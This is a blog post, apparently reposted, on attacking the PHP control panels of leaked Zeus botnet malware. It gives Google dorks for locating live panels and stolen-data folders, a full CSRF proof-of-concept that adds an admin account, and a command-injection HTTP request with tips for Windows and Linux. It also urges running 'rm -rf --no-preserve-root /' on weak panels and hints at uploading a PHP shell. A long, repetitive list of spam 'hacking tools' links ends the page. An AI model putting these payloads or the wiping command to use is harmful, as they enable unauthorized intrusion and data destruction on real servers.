jueves, 25 de mayo de 2023

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
  • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)
Related news

  1. Install Pentest Tools Ubuntu
  2. Android Hack Tools Github
  3. Hacker Tool Kit
  4. Hacking Tools For Beginners
  5. Hack Tool Apk No Root
  6. Hacker Hardware Tools
  7. Pentest Tools
  8. Hacking Tools For Pc
  9. Pentest Tools Windows
  10. Hacker Tools Github
  11. Pentest Tools Website Vulnerability
  12. Hacker Tools Mac
  13. Hacking Tools Usb
  14. Hacking Tools For Games
  15. Computer Hacker
  16. Hack Rom Tools
  17. Github Hacking Tools
  18. How To Hack
  19. New Hacker Tools
  20. Hacker Tools Mac
  21. Hack Rom Tools
  22. Hacking App
  23. Best Hacking Tools 2020
  24. Pentest Tools List
  25. World No 1 Hacker Software
  26. What Is Hacking Tools
  27. Usb Pentest Tools
  28. Nsa Hack Tools
  29. Hak5 Tools
  30. Pentest Tools Find Subdomains
  31. Computer Hacker
  32. Nsa Hacker Tools
  33. Hacking Tools Free Download
  34. Hacking Tools And Software
  35. Hacking Tools For Windows Free Download
  36. Hacker
  37. Pentest Tools For Ubuntu
  38. Pentest Tools Free
  39. Hack Website Online Tool
  40. Termux Hacking Tools 2019
  41. Hacking Tools Hardware
  42. Pentest Tools For Mac
  43. Pentest Automation Tools
  44. Hacker Tools Windows
  45. Hack Tool Apk
  46. Best Hacking Tools 2020
  47. Hacker Security Tools
  48. Hack Tools Online
  49. Hacker Tools 2019
  50. Hacking Tools 2019
  51. Hacker Tools For Mac
  52. Hacker Tools Github
  53. Hacker Hardware Tools
  54. Growth Hacker Tools
  55. Hacking Tools For Windows 7
  56. Pentest Recon Tools
  57. How To Install Pentest Tools In Ubuntu
  58. New Hacker Tools
  59. Beginner Hacker Tools
  60. Hack Tools
  61. Pentest Tools Download
  62. Best Pentesting Tools 2018
  63. Hack Rom Tools
  64. How To Install Pentest Tools In Ubuntu
  65. Pentest Tools Port Scanner
  66. Hack Tools For Games
  67. Hack Rom Tools
  68. Pentest Tools Open Source
  69. Hacking Tools Pc
  70. Hacking Tools For Windows
  71. Blackhat Hacker Tools
  72. Hack Tool Apk
  73. Hacking Tools For Games
  74. Hacking Tools Software
  75. Hacks And Tools
  76. Hacking Tools Hardware
  77. Hacks And Tools
  78. Usb Pentest Tools
  79. Hack Tools Online
  80. Hacking Tools For Windows Free Download
  81. Hacker Tools Mac
  82. Hacker Tool Kit
  83. Pentest Tools For Mac
  84. Hack Tool Apk No Root
  85. Hack Tools
  86. Physical Pentest Tools
  87. Pentest Reporting Tools
  88. Best Pentesting Tools 2018
  89. Hacker Tools Free
  90. Hacker Tools Github
  91. Hacking Tools Online
  92. Physical Pentest Tools
  93. Bluetooth Hacking Tools Kali
  94. Hackers Toolbox
  95. Growth Hacker Tools
  96. Best Hacking Tools 2019
  97. How To Hack
  98. Pentest Tools Find Subdomains
  99. What Are Hacking Tools
  100. Hacking Tools For Windows 7
  101. Hacking App
  102. Ethical Hacker Tools
  103. Hacker Tools List
  104. Nsa Hack Tools Download
  105. Hack Tools 2019
  106. Hacker Tools Free Download
  107. Android Hack Tools Github
  108. Pentest Tools Website Vulnerability
  109. Hacking Tools Name
  110. Hacker Tools Software
  111. Hacking Tools For Kali Linux
  112. Hacker Security Tools
  113. Hacking Tools For Beginners
  114. Hack Tools
  115. Hacker Security Tools
  116. Hacker Security Tools
  117. Hacking Tools Kit
  118. Hacking Tools For Games
  119. Hack Tools Mac
  120. Hack And Tools
  121. Pentest Tools Tcp Port Scanner
  122. Hacking Tools Windows
  123. Pentest Tools Bluekeep
  124. Pentest Tools Port Scanner
  125. Hacking Tools For Windows 7
  126. Pentest Tools Free
  127. Pentest Tools Subdomain
  128. Pentest Tools Kali Linux
  129. Hacking Tools Kit
  130. Wifi Hacker Tools For Windows
  131. Pentest Tools
  132. Pentest Tools
  133. Hacker Tools Free Download
  134. Hacker Tools 2020

No hay comentarios:

Publicar un comentario